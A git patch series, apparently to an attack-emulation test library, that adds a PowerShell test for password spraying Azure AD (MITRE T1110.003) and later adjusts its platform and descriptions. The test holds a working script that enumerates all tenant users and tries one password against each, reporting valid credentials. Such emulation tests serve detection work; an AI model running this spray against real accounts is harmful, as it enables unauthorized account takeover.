From f0735020e737cfa5397f5c52777015052ff8eebd Mon Sep 17 00:00:00 2001 From: piaconsigny <49986009+piaconsigny@users.noreply.github.com> Date: Thu, 27 May 2021 08:55:55 -0700 Subject: [PATCH 1/4] T1110.003 azureadaccounts --- atomics/T1110.003/T1110.003.yaml | 56 ++++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml index afa612f3..d6f731bd 100644 --- a/atomics/T1110.003/T1110.003.yaml +++ b/atomics/T1110.003/T1110.003.yaml @@ -105,3 +105,59 @@ atomic_tests: } } Write-Host "End of password spraying" + +- name: Password spray all Azure AD users with a single password + auto_generated_guid: a8aa2d3e-1c52-4016-bc73-0f8854cfa80a + description: | + Attempt to brute force all Azure AD users with a single password (called "password spraying") via AzureAD Powershell module. + Valid credentials are only needed to fetch the list of Azure AD users. + supported_platforms: + - windows + input_arguments: + password: + description: Single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001) + type: String + default: P@ssw0rd! + valid_username: + description: Valid username to retrieve Azure AD users + type: String + default: bruce.wayne@contoso.com + valid_password: + description: Valid password to authenticate as valid_username + type: string + default: iamthebatman + dependency_executor_name: powershell + dependencies: + - description: | + AzureAD module must be installed. + prereq_command: | + if (Get-Module AzureAD) {exit 0} else {exit 1} + get_prereq_command: | + Install-Module -Name AzureAD -Force + executor: + name: powershell + elevation_required: false + command: | + Import-Module -Name AzureAD + $PWord = ConvertTo-SecureString -String "#{valid_password}" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{valid_username}", $Pword + Connect-AzureAD -Credential $Credential > $null + + ($Users = Get-AzureADUser -All $true) > $null + Disconnect-AzureAD > $null + $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force + + $Users | Foreach-Object { + $user = $_.UserPrincipalName + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "$user", $Pword + try { + Write-Host " [-] Attempting #{password} on account ${user}." + Connect-AzureAD -Credential $Credential 2>&1> $null + # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success + Write-Host " [!] ${user}:#{password} are valid credentials!`r`n" + Disconnect-AzureAD > $null + } catch { + Write-Host " [-] ${user}:#{password} invalid credentials.`r`n" + } + } + Write-Host "End of password spraying" From 3c787ea2950511cca22f6d648374712b8efc8fe6 Mon Sep 17 00:00:00 2001 From: piaconsigny <49986009+piaconsigny@users.noreply.github.com> Date: Mon, 7 Jun 2021 17:33:23 +0200 Subject: [PATCH 2/4] Change supported_platform to azure-ad --- atomics/T1110.003/T1110.003.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml index d6f731bd..3e7aca1b 100644 --- a/atomics/T1110.003/T1110.003.yaml +++ b/atomics/T1110.003/T1110.003.yaml @@ -112,7 +112,7 @@ atomic_tests: Attempt to brute force all Azure AD users with a single password (called "password spraying") via AzureAD Powershell module. Valid credentials are only needed to fetch the list of Azure AD users. supported_platforms: - - windows + - azure-ad input_arguments: password: description: Single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001) From 6f2f97ad74c9c1b725f2b4fb7851dd2b43a87478 Mon Sep 17 00:00:00 2001 From: piaconsigny <49986009+piaconsigny@users.noreply.github.com> Date: Fri, 2 Jul 2021 13:50:01 +0200 Subject: [PATCH 3/4] Apply suggestion --- atomics/T1110.003/T1110.003.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml index 3e7aca1b..315f6e0d 100644 --- a/atomics/T1110.003/T1110.003.yaml +++ b/atomics/T1110.003/T1110.003.yaml @@ -119,7 +119,7 @@ atomic_tests: type: String default: P@ssw0rd! valid_username: - description: Valid username to retrieve Azure AD users + description: Valid username to retrieve Azure AD users. We encourage users running this atomic to add a valid microsoft account domain; for eg @ type: String default: bruce.wayne@contoso.com valid_password: From b62c0a024afa56882ca61f4f645c3f52dc6c1724 Mon Sep 17 00:00:00 2001 From: piaconsigny <49986009+piaconsigny@users.noreply.github.com> Date: Fri, 2 Jul 2021 13:53:39 +0200 Subject: [PATCH 4/4] Apply suggestion --- atomics/T1110.003/T1110.003.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml index 315f6e0d..0ebeed4c 100644 --- a/atomics/T1110.003/T1110.003.yaml +++ b/atomics/T1110.003/T1110.003.yaml @@ -123,7 +123,7 @@ atomic_tests: type: String default: bruce.wayne@contoso.com valid_password: - description: Valid password to authenticate as valid_username + description: Valid password to authenticate as valid_username in the type: string default: iamthebatman dependency_executor_name: powershell